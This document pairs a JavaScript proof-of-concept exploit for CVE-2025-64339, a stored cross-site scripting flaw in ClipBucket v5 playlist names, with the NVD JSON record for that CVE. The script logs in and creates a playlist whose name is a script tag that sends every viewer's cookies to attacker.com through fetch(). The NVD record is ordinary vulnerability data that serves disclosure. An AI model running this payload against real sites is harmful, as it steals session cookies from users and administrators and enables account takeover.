CVE-2025-64339

// CVE-2025-64339 PoC - Stored XSS in ClipBucket v5 Playlist Name // Steps to reproduce: // 1. Authenticate with low-privileged account // 2. Navigate to Manage Playlists feature // 3. Create new playlist with malicious name const axios = require('axios'); const TARGET_URL = 'http://target-clipbucket.com'; const USERNAME = 'attacker_user'; const PASSWORD = 'attacker_password'; // XSS payload - steals cookies const XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; async function exploit() { // Step 1: Login to get authentication cookie const loginResponse = await axios.post(`${TARGET_URL}/login`, { username: USERNAME, password: PASSWORD }); const cookies = loginResponse.headers['set-cookie']; // Step 2: Create playlist with XSS payload in name const createPlaylistResponse = await axios.post( `${TARGET_URL}/playlists/create`, { playlist_name: XSS_PAYLOAD, playlist_description: 'Test playlist' }, { headers: { Cookie: cookies } } ); console.log('Playlist created with XSS payload'); console.log('When any user views the playlist, the script will execute'); } exploit().catch(console.error);

{"cve": {"id": "CVE-2025-64339", "sourceIdentifier": "[email protected]", "published": "2025-11-07T06:15:33.477", "lastModified": "2025-11-26T15:42:24.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket v5 is an open source video sharing platform. In versions 5.5.2-#146 and below, the Manage Playlists feature is vulnerable to stored Cross-site Scripting (XSS),specifically in the Playlist Name field. An authenticated low-privileged user can create a playlist with a malicious name containing HTML/JavaScript code, which is rendered unescaped on playlist detail and listing pages. This results in arbitrary JavaScript execution in every viewer’s browser, including administrators. This issue is fixed in version 5.5.2-#147."}, {"lang": "es", "value": "ClipBucket v5 es una plataforma de código abierto para compartir videos. En las versiones 5.5.2-#146 e inferiores, la función 'Manage Playlists' (Gestionar Listas de Reproducción) es vulnerable a 'cross-site scripting' (XSS) almacenado, específicamente en el campo 'Playlist Name' (Nombre de la Lista de Reproducción). Un usuario autenticado con bajos privilegios puede crear una lista de reproducción con un nombre malicioso que contenga código HTML/JavaScript, el cual se renderiza sin escapar en las páginas de detalle y listado de las listas de reproducción. Esto resulta en la ejecución arbitraria de JavaScript en el navegador de cada espectador, incluyendo a los administradores. Este problema está solucionado en la versión 5.5.2-#147."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndExcluding": "5.5.2-147", "matchCriteriaId": "31214EBB-325C-478D-9E78-FACDB17B17D2"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/8e3cf79ce2721fbebde68a05a9a1a6319f086bcc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-c695-m4g4-v3fv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}